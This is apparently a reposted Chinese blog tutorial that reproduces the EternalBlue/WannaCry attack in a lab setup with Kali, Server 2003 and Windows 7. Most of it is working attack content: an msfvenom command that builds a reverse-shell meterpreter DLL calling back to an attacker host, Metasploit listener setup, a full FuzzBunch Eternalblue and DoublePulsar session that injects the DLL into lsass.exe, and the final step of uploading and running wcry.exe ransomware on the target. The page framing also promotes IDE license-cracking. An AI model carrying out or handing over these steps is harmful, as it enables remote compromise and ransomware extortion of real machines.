永恒之蓝勒索病毒_2019勒索病毒专杀

永恒之蓝勒索病毒_2019勒索病毒专杀整个的复现的过程需要的环境以及工具有:kali2.0:用来监听获取反弹的shell。ip:192.168.15.174winsever2003:需要装上python环境,勒索病毒攻击机。ip:192.168.15.141win2007:靶机,确保445端口开启。ip:192.168.15.144永恒之蓝python2.6已经在winsever下装python需…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE稳定放心使用

整个的复现的过程需要的环境以及工具有:

  1. kali 2.0:用来监听获取反弹的shell。ip:192.168.15.174

  2. winsever 2003 :需要装上python环境,勒索病毒攻击机。ip:192.168.15.141

  3. win2007 :靶机,确保445端口开启。ip:192.168.15.144

  4. 永恒之蓝利用脚本shadowbroker-master以及勒索病毒wcry.exe,脚本shadowbroker-master的文件夹放在server2003 C盘根目录下,勒索病毒在kali的根目录下。
    在这里插入图片描述

  5. python2.6已经在winsever下装python需要的环境pywin32-221.win32.在sever2003中分别安装这些文件,并配置python环境变量,确保python能够正常运行
    在这里插入图片描述
    攻击环节:
    1.在2003中修改C:\shadowbroker-master\windows下的Fuzzbunch.xml文件,修改内容如下,在这里要找到对应文件中的Resources文件的位置,然后对这个xml文件进行修改。在c:\的根目录下创建logs文件。
    在这里插入图片描述
    2.在kali上创建回链文件s.dll 命令如下:

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.15.128 LPORT=4444 -f dll > s.dll
    在这里插入图片描述
    在生成文件后,把s.dll文件放到2003的根目录下,其中lhost中的ip地址为kali的ip 端口是随机的未占用端口。

3.在kali上运行,msfconsole,进行监听,命令如
msfconsole
use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
在这里插入图片描述
4. 在server2003上运行永恒之蓝利用脚本,发起对win2007的攻击:
python C:\shadowbroker-master\windows\fb.py

脚本配置环节,配置过程由上向下进行,关键点标,请注意:
[+] Set FbStorage => C:\shadowbroker-master\windows\storage
[*] Retargetting Session
[?] Default Target IP Address [] : 192.168.15.144
[?] Default Callback IP Address [] : 192.168.15.174
[?] Use Redirection [yes] : no

[?] Base Log directory [C:\logs] :
[*] Checking C:\logs for projects
Index Project


0 110
1 111
2 112
3 Create a New Project
[?] Project [0] : 3

[?] New Project Name : 1123
[?] Set target log directory to ‘C:\logs\1123\z192.168.15.144’? [Yes] :
[*] Initializing Global State
[+] Set TargetIp => 192.168.15.144
[+] Set CallbackIp => 192.168.15.174
[!] Redirection OFF
[+] Set LogDir => C:\logs\1123\z192.168.15.144
[+] Set Project => 1123

fb > use Eternalblue
[!] Entering Plugin Context :: Eternalblue
[] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.15.144
[
] Applying Session Parameters
[*] Running Exploit Touches

[!] Enter Prompt Mode :: Eternalblue
**Module: Eternalblue
=================**
Name Value


NetworkTimeout 60
TargetIp 192.168.15.144
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
Target WIN72K8R2
[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :
[] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 f
or no timeout.
[?] NetworkTimeout [60] :
[
] TargetIp :: Target IP Address
[?] TargetIp [192.168.15.144] :
[] TargetPort :: Port used by the SMB service for exploit connection
[?] TargetPort [445] :
[
] VerifyTarget :: Validate the SMB string from target against the target sele
cted before exploitation.
[?] VerifyTarget [True] :
[] VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor befor
e throwing. This option must be enabled for multiple exploit attempts.
[?] VerifyBackdoor [True] :
[
] MaxExploitAttempts :: Number of times to attempt the exploit and groom. Dis
abled for XP/2K3.
[?] MaxExploitAttempts [3] :

[*] GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup
allocations (XK/2K3) to do.

[?] GroomAllocations [12] :
**[] Target :: Operating System, Service Pack, and Architecture of target OS
0) XP Windows XP 32-Bit All Service Packs
1) WIN72K8R2 Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs
[?] Target [1] : 1

[!] Preparing to Execute Eternalblue

*[] Mode :: Delivery mechanism
*0) DANE Forward deployment via DARINGNEOPHYTE
1) FB Traditional deployment from within FUZZBUNCH

[?] Mode [0] : 1

[+] Run Mode: FB
[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure?
(y/n) [Yes] :
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel – local-tunnel-1
[?] Destination IP [192.168.15.144] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.15.144:445
[+] Configure Plugin Remote Tunnels
**Module: Eternalblue
===================**
Name Value


DaveProxyPort 0
NetworkTimeout 60
TargetIp 192.168.15.144
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
ShellcodeBuffer
Target WIN72K8R2
[?] Execute Plugin? [Yes] :
[] Executing Plugin
在连接成功后:
use DoublePulsar
[
] TargetPort :: Port used by the Double Pulsar back door
[?] TargetPort [445] :

[*] Protocol :: Protocol for the backdoor to speak
*0) SMB Ring 0 SMB (TCP 445) backdoor
1) RDP Ring 0 RDP (TCP 3389) backdoor
[?] Protocol [0] : 0

[*] Architecture :: Architecture of the target OS
*0) x86 x86 32-bits
1) x64 x64 64-bits
[?] Architecture [0] : 1
[
+] Set Architecture => x64

[*] Function :: Operation for backdoor to perform
*0) OutputInstall Only output the install shellcode to a binary file on d
isk.
1) Ping Test for presence of backdoor
2) RunDLL Use an APC to inject a DLL into a user mode process.
3) RunShellcode Run raw shellcode
4) Uninstall Remove’s backdoor from system
[?] Function [0] : 2
[+] Set Function => RunDLL

[] DllPayload :: DLL to inject into user mode
[?] DllPayload [] : C:\s.dll
[+] Set DllPayload => C:\s.dll
[
] DllOrdinal :: The exported ordinal number of the DLL being injected to call
[?] DllOrdinal [1] :
[] ProcessName :: Name of process to inject into
[?] ProcessName [lsass.exe] :
[
] ProcessCommandLine :: Command line of process to inject into
[?] ProcessCommandLine [] :
[!] Preparing to Execute Doublepulsar

上述执行完后会反弹给kali一个session,ip可以忽略:
在这里插入图片描述
在这以后已经拿到2007的shell了,然后输入shell把wcry.exe上传到2007并执行即可勒索win2007,
在这里插入图片描述
在这里插入图片描述
5.成功勒索win2007:
在这里插入图片描述

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/181227.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
blank

相关推荐

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号